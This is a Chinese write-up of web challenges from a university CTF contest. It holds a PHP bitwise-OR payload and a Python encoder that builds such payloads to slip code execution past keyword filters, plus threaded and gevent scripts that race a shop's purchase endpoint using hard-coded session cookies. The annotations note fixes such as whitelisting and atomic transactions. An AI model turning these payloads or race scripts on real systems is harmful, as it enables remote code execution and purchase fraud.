[CTF]GUET梦极光杯线下赛web部分WP

Cover with trick

思路:用双写绕过关键字过滤,再利用变量覆盖。(只做一次关键字替换的过滤挡不住双写,服务端应改用白名单校验。)

Construct Master

"%07%15%05%14%03%14%06"|"%60%60%60%60%60%60%60"

import urllib
from sys import *
import os


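def action(arg):
	"""Encode *arg* as a quoted ``("left"|"right")`` pair using the rce.txt table.

	Each line of ``rce.txt`` is read positionally: column 0 is the character,
	columns 2-4 are the piece appended to the left string and columns 6-8 the
	piece appended to the right string. For every character of *arg* the first
	table line starting with that character is used; characters with no table
	line are skipped silently.

	The published listing had lost the backslash escapes in the final string
	literal, so the function returned the constant text `` + s1 + | + s2 + ``
	wrapped in parentheses instead of the encoded pair. The quoting is
	restored here.

	Returns:
		str: the text ``("<left>"|"<right>")``.

	Raises:
		OSError: if *arg* is non-empty and ``rce.txt`` cannot be opened.
	"""
	table = {}
	if arg:
		# Read the table once (and close it reliably) instead of reopening
		# rce.txt for every input character.
		with open("rce.txt", "r") as fh:
			for line in fh:
				# setdefault keeps the first line for a character, matching a
				# top-down scan that stops at the first hit.
				table.setdefault(line[0], (line[2:5], line[6:9]))
	left = []
	right = []
	for ch in arg:
		if ch in table:
			first, second = table[ch]
			left.append(first)
			right.append(second)
	return '("' + "".join(left) + '"|"' + "".join(right) + '")'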
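# Interactive driver: read a string, print its encoded form, repeat.
# The prompt's leading "\n" escape is restored; the published listing showed a
# bare "n", presumably because the backslash was lost along with the ones in
# action().
while True:
	try:
		param = action(input("\n[+] your function:"))
	except (EOFError, KeyboardInterrupt):
		# Ctrl-D / Ctrl-C ends the prompt loop cleanly instead of a traceback.
		break
	print(param)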

rce.txt 的生成方法详见我的另一篇文章。脚本按固定列读取每一行:第 1 个字符是待编码字符,第 3–5 个字符和第 7–9 个字符分别是两段 %XX 编码。

WEB Engineer

用 curl 或者直接用 Burp Suite 发包访问 index.php 即可。

race on shop


条件竞争:并发地一直购买,然后带着购买完的 cookie 去访问 flag.php 即可。(这类问题的根因通常是「检查余额—扣款」不是原子操作,服务端应使用事务或加锁来保证购买流程的原子性。)

import requests
import threading
# Challenge endpoints on the event's private (RFC 1918) network:
# `url` is the purchase request, `url2` the flag page.
url = "http://172.16.68.4:28013/?id=2"
url2 = "http://172.16.68.4:28013/flag.php"

# Cookies sent with every purchase request. The values are hard-coded,
# presumably copied from the author's own session during the event.
cookie1 = {
    "PHPSESSID": "99c6b70d71e29eb6c11e9321c363393e",
    "gold_card_id": "afd3475b15b945e2efd00f66583c61c4",
}

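def bp(session):
    """Send one purchase request through *session* and print the page on success.

    Uses the module-level ``url`` and ``cookie1``. The response body is
    printed only when it contains the marker "成功" ("success").

    Args:
        session: a ``requests`` session; the caller shares one across threads.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    # NOTE(review): requests.Session is not documented as thread-safe; sharing
    # one across worker threads works here only on a best-effort basis.
    # A bounded timeout keeps a stalled connection from hanging the worker
    # thread (and therefore the whole process) indefinitely.
    r = session.get(url, cookies=cookie1, timeout=5)
    if "成功" in r.text:
        print(r.text)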
if __name__ == '__main__':
    # One session object is created and handed to every worker thread.
    shared_session = requests.session()
    # Start 50 threads that each issue a single request via bp(); the threads
    # are non-daemon and are not joined explicitly.
    for _ in range(50):
        worker = threading.Thread(target=bp, args=(shared_session,))
        worker.start()

或者

import requests
import threading

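def get():
	"""Send a single purchase request with the hard-coded cookie.

	The response is not inspected; the call exists only for its effect on
	the server.

	Raises:
		requests.RequestException: on connection failure or timeout.
	"""
	url = "http://172.16.68.4:28045/?id=2"
	cookie1 = {'gold_card_id': 'afd3475b15b945e2efd00f66583c61c4'}
	# The response was assigned to an unused local; it is dropped here.
	# A bounded timeout keeps one stalled connection from blocking its
	# worker forever.
	requests.get(url, cookies=cookie1, timeout=5)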
# def get1():
# 	try:
# 		while True:
# 			r=requests.get(url,cookies=cookie1)
# 			if "成功" in r.text:
# 				print(r.text)
# 	except:
# 		pass
# def get2():
# 	try:
# 		while True:
# 			r=requests.get(url,cookies=cookie1)
# 			if "成功" in r.text:
# 				print(r.text)
# 	except:
# 		pass
# def get3():
# 	try:
# 		while True:
# 			r=requests.get(url,cookies=cookie1)
# 			if "成功" in r.text:
# 				print(r.text)
# 	except:
# 		pass
# def get4():
# 	try:
# 		while True:
# 			r=requests.get(url,cookies=cookie1)
# 			if "成功" in r.text:
# 				print(r.text)
# 	except:
# 		pass
# if __name__ == '__main__':
# 	event=threading.Event()
# 	event.set()
# 	while True:
# 		for i in range(1,50):
# 			t=threading.Thread(target=get)
# 			t.start()
# 			t2=threading.Thread(target=get1)
# 			t.start()
# 			t3 = threading.Thread(target=get2)
# 			t.start()
# 			t4 = threading.Thread(target=get3)
# 			t.start()
# 			t5 = threading.Thread(target=get4)
# 			t.start()
if __name__ == '__main__':
	# NOTE(review): monkey.patch_all() runs after `requests` has already been
	# imported at the top of the script; gevent's documentation asks for
	# patching as early as possible, so confirm the requests are really
	# cooperative in this order.
	import gevent
	from gevent import monkey
	from gevent.pool import Pool
	monkey.patch_all()

	# Pool capped at 100 greenlets; 50 calls to get() are scheduled on it.
	workers = Pool(100)
	for _ in range(50):
		workers.spawn(get)

	# Block until the scheduled greenlets have finished.
	gevent.wait()
